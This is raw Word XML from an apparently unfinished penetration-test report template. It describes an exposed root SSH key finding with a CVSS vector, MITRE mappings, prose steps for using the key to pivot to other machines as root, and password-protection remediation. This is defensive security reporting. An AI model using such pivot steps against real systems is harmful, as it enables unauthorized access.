        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Rfcd44a894e9948e4">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="785D6661">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>CISA - PrintNightmare Security Advisory</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="18A79D02" w:rsidP="0D325B6E" w:rsidRDefault="18A79D02" w14:paraId="7923A70B" w14:textId="3545456F">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R845578bbd79842f8">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="18A79D02">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Microsoft - PrintNightmare Security Patch</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="08DC6CAA" w14:textId="67D0C174">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="11F6C602" w:rsidP="0D325B6E" w:rsidRDefault="11F6C602" w14:paraId="21B7C4CE" w14:textId="712FB56F">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223571661" w:id="1948519764"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="11F6C602">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="11F6C602">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="11F6C602">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc1973382015" w:id="1249103555"/>
      <w:bookmarkStart w:name="_Toc33186948" w:id="1863845357"/>
      <w:bookmarkStart w:name="_Toc1148656341" w:id="1158755207"/>
      <w:bookmarkStart w:name="_Toc131196545" w:id="448897717"/>
      <w:bookmarkStart w:name="_Toc976782419" w:id="1427697576"/>
      <w:bookmarkStart w:name="_Toc1660211279" w:id="655061973"/>
      <w:bookmarkStart w:name="_Toc1818131399" w:id="1759097169"/>
      <w:bookmarkStart w:name="_Toc1065154190" w:id="1831100361"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="643DB353">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exposed SSH Keys</w:t>
      </w:r>
      <w:bookmarkEnd w:id="655061973"/>
      <w:bookmarkEnd w:id="1759097169"/>
      <w:bookmarkEnd w:id="1831100361"/>
      <w:bookmarkEnd w:id="1249103555"/>
      <w:bookmarkEnd w:id="1863845357"/>
      <w:bookmarkEnd w:id="1158755207"/>
      <w:bookmarkEnd w:id="448897717"/>
      <w:bookmarkEnd w:id="1427697576"/>
      <w:bookmarkEnd w:id="1948519764"/>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7B7DBFC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D78F7CC" w14:textId="26F28FB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E6631ED" w14:textId="32F174E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084E83" w14:textId="4B24583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5553C6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D333503" w14:textId="0948FCF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5EFF834" w14:textId="78CDFCF5">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EBFCC75" w14:textId="58D4D3A7">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642D1C2C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>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A18F0E7" w14:textId="0BF86641">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1ECBFF2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68FD90" w14:textId="0E4941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1CBD177" w:rsidP="0D325B6E" w:rsidRDefault="71CBD177" w14:paraId="35C7A681" w14:textId="07918987">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71CBD177">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293B9A6"/>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2FE0FA5"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4C781F4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FDEE4BF" w14:textId="5E57D94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817090F" w:rsidP="0D325B6E" w:rsidRDefault="4817090F" w14:paraId="65A034F1" w14:textId="4C2EF60E">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" r:id="Ra2cffe04b3354ef9">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="4817090F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="71E703EF">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EFD0DC" w14:textId="6DBBACD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7A82B3D" w:rsidP="0D325B6E" w:rsidRDefault="17A82B3D" w14:paraId="1F5F5CBD" w14:textId="77DD0BAF">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="17A82B3D">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F236C79" w:rsidP="0D325B6E" w:rsidRDefault="3F236C79" w14:paraId="1E022EF9" w14:textId="385A7145">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rda6f37875f174b85">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="3F236C79">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1552.004</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="299F161A">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3F236C79">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Unsecured Credentials</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0CD70469">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3F236C79">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3F236C79">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Private Keys</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="2B0A8B0E">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C5ED804"/>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C5E84C" w:rsidP="0D325B6E" w:rsidRDefault="7AC5E84C" w14:paraId="2ADD776C" w14:textId="73A11FF6">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="7AC5E84C">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5008EE6" w:rsidP="0D325B6E" w:rsidRDefault="35008EE6" w14:paraId="5716F3EA" w14:textId="17CBEC41">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R746fa835fb3d4004">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="35008EE6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1022: Restrict File and Directory Permissions</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="35008EE6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="67AD1214" w:rsidP="0D325B6E" w:rsidRDefault="67AD1214" w14:paraId="4870A7CC" w14:textId="2A6F6BB0">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R22e356bc8e6048f9">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="67AD1214">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1047: Audit</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="1030B2DA">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038DCE" w14:textId="2076094A">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1D6D26E" w14:textId="177B8EDD">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05C8438" w14:textId="1D14DBD5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="643DB353" w:rsidP="0D325B6E" w:rsidRDefault="643DB353" w14:paraId="1DFC2C6B" w14:textId="6F077B6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BBC5271" w:rsidP="0D325B6E" w:rsidRDefault="0BBC5271" w14:paraId="1868D968" w14:textId="3032D59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0BBC5271">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contains</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 xml:space="preserve"> the private </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6181D93D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SSH</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 xml:space="preserve"> key for </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="33134239">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3313423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w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="33134239">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root user</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BBC5271">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to the following machines</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="507FA032">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56B258BF" w14:textId="220E9A0C">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43DB353" w:rsidP="0D325B6E" w:rsidRDefault="643DB353" w14:paraId="5B7F952C" w14:textId="143CC4F7">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643DB35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4994B98" w:rsidP="0D325B6E" w:rsidRDefault="74994B98" w14:paraId="401BEF9E" w14:textId="5842AF53">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="74994B98">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If an attacker gains unauthorized access to this machine, they can </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="74994B98">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pivot to</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="74994B98">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> further machines as root.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="01E9C3A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1E9C3A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ADD MORE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="391E7DFF" w14:textId="71B488A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43DB353" w:rsidP="0D325B6E" w:rsidRDefault="643DB353" w14:paraId="42B79E08" w14:textId="283FB1F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43DB353" w:rsidP="0D325B6E" w:rsidRDefault="643DB353" w14:paraId="72414231" w14:textId="633BEAF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 xml:space="preserve">Log into the machine as </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="70AA98C9">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p>
    <w:p w:rsidR="70AA98C9" w:rsidP="0D325B6E" w:rsidRDefault="70AA98C9" w14:paraId="17FA8A2F" w14:textId="7F25E43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Enumerate</w:t>
      </w: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 xml:space="preserve"> the file system and discover the private ssh key in </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="70AA98C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the following directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="70AA98C9" w:rsidP="0D325B6E" w:rsidRDefault="70AA98C9" w14:paraId="1453D5E3" w14:textId="2890DBD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 xml:space="preserve">Step 3: Use the found private key to log into </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="70AA98C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>further machines</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="70AA98C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="269651D7" w14:textId="61E6A85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43DB353" w:rsidP="0D325B6E" w:rsidRDefault="643DB353" w14:paraId="538E313C" w14:textId="313EE2B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43DB353" w:rsidP="0D325B6E" w:rsidRDefault="643DB353" w14:paraId="6AB241E0" w14:textId="08149CC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643DB35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1009836A">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1009836A" w:rsidP="0D325B6E" w:rsidRDefault="1009836A" w14:paraId="6AC2646F" w14:textId="7DB7F4F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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009836A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>All</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="643D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694DF4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH keys for Administrator </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="491D7663">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2694DF4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157D83C">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2694DF4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">oot </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4E5AEB07">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>should</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2694DF4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> be password protected</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 xml:space="preserve">. This ensures </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low-privilege</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 xml:space="preserve"> account</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cannot</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tilize</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08B78BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>these keys to gain full-system access and pivot to more of the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43428507" w:rsidP="0D325B6E" w:rsidRDefault="43428507" w14:paraId="062DA16F" w14:textId="3EE21218">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
